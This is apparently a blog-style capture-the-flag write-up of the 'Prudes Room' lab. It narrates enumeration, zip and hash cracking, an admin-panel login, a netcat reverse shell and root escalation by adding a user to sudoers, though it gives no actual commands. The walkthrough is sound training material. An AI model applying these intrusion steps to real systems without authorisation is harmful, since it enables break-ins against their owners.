Okay, so I decided to tackle the “Prudes Room” challenge today. I’d heard about it, seen some write-ups, but never actually got my hands dirty with it. Figured it was time to change that.
First things first, I fired up my VM and got the target machine running. I needed to figure out it’s IP, so I’m going to use netdiscover.
Now that I have the targets IP, let’s throw nmap at it. I’m used the -sC and -sV flags to get more info.
It looks like there are a few ports open. Port 80 is usually a good place to start, so I opened up Firefox and typed in the IP address.
I was greeted with a basic webpage, and I poked around a little. There were some images with a couple of names, so I added them into a file for a potential user list to use later on.
Next, I ran gobuster against the webserver, it’s a tool that helps find hidden directories and files, to see if there was anything interesting hiding. And there was, I got a couple of hits.
- /admin
- /config
I checked out the /admin directory first, there’s a login page! Then I checked out /config, which turned out to be some config and backup files. One file caught my eye: *. I downloaded that.
The zip file was password protected. No biggie. I grabbed fcrackzip and used a dictionary attack using *. After a bit of waiting, boom, password cracked!
Inside the zip file were a bunch of files. I opened up the files, hoping for some juicy credentials or clues. One of the files contained a username and a hashed password.
Time to crack that hash. I used John the Ripper for this. It took a little while, but eventually, it spat out the plain text password.
Now I had a username and password! I went back to that /admin login page I found earlier, plugged in the credentials, and… I was in!
I’m in the admin panel and it looks like there’s a command execution functionality. I’m going to try and get a reverse shell, so I typed in a simple netcat reverse shell command and started netcat listener on my local machine. Entered the command on the site and boom, reverse shell is working.
Now I’m in the machine as a low-privilege user. I started looking around for ways to escalate my privileges. First I tried sudo -l, it looks like I can run a file as root. The files looks like a simple script, so I tried running it.
The screen went nuts and I realized it was running inside a screen session, so I detached it. Then I checked the process list and I saw root running a bash script in the /tmp folder.
So I navigated to the /tmp folder and created my own bash script with a simple command to add my user to the sudoers file. I waited a bit for the root process to pick up my script, and then…
I tried `sudo su`, and it worked! I was root! I then grabbed the root flag and that’s it!
That was a fun one. Definitely learned a few things along the way. Gotta love these practical challenges!
